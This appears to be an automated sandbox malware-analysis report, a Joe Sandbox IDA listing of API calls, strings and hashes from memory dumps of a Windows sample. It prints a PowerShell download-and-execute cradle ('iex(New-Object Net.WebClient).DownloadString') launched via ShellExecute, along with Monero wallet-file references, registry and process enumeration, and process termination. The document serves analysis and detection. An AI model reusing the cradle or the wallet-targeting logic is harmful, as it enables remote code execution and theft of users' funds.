                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: 675aa9ded62f6a0b53526d8c258a05e748edbf656850564cd993f6058d0a1715
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: A941B430A00218EFCF10DF69C880A9EBBF5FF49314F149166E81ABB392D7319946CB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E6501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E65021
                                  • InternetOpenA.WININET(00E80DE3,00000000,00000000,00000000,00000000), ref: 00E6503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E65061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E65091
                                  • InternetCloseHandle.WININET(?), ref: 00E65109
                                  • InternetCloseHandle.WININET(?), ref: 00E65116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 8f8dce039544cd07e7d73b1d2b18f38a09810aa1eaacf9fd8767d7252c29972f
                                  • Instruction ID: ae7f0d204e2c962c269ed2dfa3f486e8a2228efe60a288dfb829b0f719cab599
                                  • Opcode Fuzzy Hash: 8f8dce039544cd07e7d73b1d2b18f38a09810aa1eaacf9fd8767d7252c29972f
                                  • Instruction Fuzzy Hash: BA3116F5A40218ABDB24CF54DC85BDDB7B5AB48304F1081E8FA09B7285C7B06AC58F98
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E785B6
                                  • wsprintfA.USER32 ref: 00E785E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E7860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E7861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E78629
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0173DD50,00000000,000F003F,?,00000400), ref: 00E7867C
                                  • lstrlen.KERNEL32(?), ref: 00E78691
                                  • RegQueryValueExA.ADVAPI32(00000000,0173DCF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E80B3C), ref: 00E78729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E78798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E787AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: c99eb1ae1eb8e239909bd66fa0af0a86c995743a9d8aa7b1314aaf62eeb0f461
                                  • Instruction ID: f851525f2ba8dabc63dfadfc3e59c49399246426879a44a26d516012224ae7e1
                                  • Opcode Fuzzy Hash: c99eb1ae1eb8e239909bd66fa0af0a86c995743a9d8aa7b1314aaf62eeb0f461
                                  • Instruction Fuzzy Hash: 78210CB1950218ABDB28DB54CC85FE9B3B8FB48704F10C1E9E60DA6184DF706A85CF94
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E799C5
                                  • Process32First.KERNEL32(00E6A056,00000128), ref: 00E799D9
                                  • Process32Next.KERNEL32(00E6A056,00000128), ref: 00E799F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E79A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E79A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 00E79A79
                                  • CloseHandle.KERNEL32(00E6A056), ref: 00E79A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: d8510c271c797d6750c9243b3139c18bbb4dc32d646973352d453b683d6fa83e
                                  • Instruction ID: 094900c5d70f8270cb928ae9f8716302c491e460615615d192828e68c45d76e7
                                  • Opcode Fuzzy Hash: d8510c271c797d6750c9243b3139c18bbb4dc32d646973352d453b683d6fa83e
                                  • Instruction Fuzzy Hash: F321B7B5900218ABDB35DFA1D889BEDB7B9BF48304F108198E519A6285D7749AC4CF90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E7783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0172B958,00000000,00020119,00000000), ref: 00E7786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0173DC00,00000000,00000000,?,000000FF), ref: 00E7788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E77898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: dc4141b6cbf5a477b607db82d72d8882f63473007e83cdeb3caf25621ffa214a
                                  • Instruction ID: f534b87330b4ca2a0114c2745f28dddcf6d9144e5ff9ba13d2e8101c60503880
                                  • Opcode Fuzzy Hash: dc4141b6cbf5a477b607db82d72d8882f63473007e83cdeb3caf25621ffa214a
                                  • Instruction Fuzzy Hash: 320167B5A04305BBEB18DBD4DD49F6D77B8EB44700F104064FA58A7288D7709A40DB51
                                  APIs
                                  • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E73D3E,?), ref: 00E7948C
                                  • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E794A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E794B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: >=$>=
                                  • API String ID: 1378416451-3543398223
                                  • Opcode ID: d4acd2e4abdb11b94eccd8283963b132f5d2af3995200390403cb910740fc860
                                  • Instruction ID: c0b8c3a712a55a26779e295223006769fc663279dc8a9fa289913bc106228c9d
                                  • Opcode Fuzzy Hash: d4acd2e4abdb11b94eccd8283963b132f5d2af3995200390403cb910740fc860
                                  • Instruction Fuzzy Hash: 48F04479E00208BBDB24DFB0DC89F9E77BAAB48714F10C554FA65A71C4E67096419B80
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                  • LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 22b74713e63835b2ff3e53be5ca1a47e33003e5a9c0b2daddac42f8a9c6be134
                                  • Instruction ID: 013acb7c9aa271e510184373eb5925a930df85dbe7f203ae42de692291ef3a6a
                                  • Opcode Fuzzy Hash: 22b74713e63835b2ff3e53be5ca1a47e33003e5a9c0b2daddac42f8a9c6be134
                                  • Instruction Fuzzy Hash: 6F313AB4E40209EFDB24CFA0D885BEE77B5BB49344F109168E911B7284D774AA80CFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,0173DE58), ref: 00E74A2B
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E74A51
                                  • lstrcat.KERNEL32(?,?), ref: 00E74A70
                                  • lstrcat.KERNEL32(?,?), ref: 00E74A84
                                  • lstrcat.KERNEL32(?,0172AE90), ref: 00E74A97
                                  • lstrcat.KERNEL32(?,?), ref: 00E74AAB
                                  • lstrcat.KERNEL32(?,0173D480), ref: 00E74ABF
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E78F20: GetFileAttributesA.KERNEL32(00000000,?,00E61B94,?,?,00E8577C,?,?,00E80E22), ref: 00E78F2F
                                    • Part of subcall function 00E747C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E747D0
                                    • Part of subcall function 00E747C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E747D7
                                    • Part of subcall function 00E747C0: wsprintfA.USER32 ref: 00E747F6
                                    • Part of subcall function 00E747C0: FindFirstFileA.KERNEL32(?,?), ref: 00E7480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 3347bc7da635a68b4726f4ac70c14839f55f274a3dae67009d0e9059d42d72a8
                                  • Instruction ID: 0df4563fcf62f438e98f3ae38b0faee640a46fc68e264fc8f89cc317be7d6ba3
                                  • Opcode Fuzzy Hash: 3347bc7da635a68b4726f4ac70c14839f55f274a3dae67009d0e9059d42d72a8
                                  • Instruction Fuzzy Hash: B23173F694020867CB28FBB0DD89EDD737CAB58700F408599F619A6085EF70A7C8CB94
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E72FD5
                                  Strings
                                  • ')", xrefs: 00E72F03
                                  • <, xrefs: 00E72F89
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E72F54
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E72F14
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 6fc75fe3e64e06fef30615949a8afd2f2b361c9764efd8eb6226c8154724b2fd
                                  • Instruction ID: dec9e6a426805f5378b82732c17277b12ccb09b7dc9a803fc8bcfb7fc5711314
                                  • Opcode Fuzzy Hash: 6fc75fe3e64e06fef30615949a8afd2f2b361c9764efd8eb6226c8154724b2fd
                                  • Instruction Fuzzy Hash: 60410E71D102089ADB14FFA0C8A2FEDB7B9AF50300F54A469E11A77196EF702A49CF51
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0173D420,00000000,00020119,?), ref: 00E74344
                                  • RegQueryValueExA.ADVAPI32(?,0173DF30,00000000,00000000,00000000,000000FF), ref: 00E74368
                                  • RegCloseKey.ADVAPI32(?), ref: 00E74372
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E74397
                                  • lstrcat.KERNEL32(?,0173DF60), ref: 00E743AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
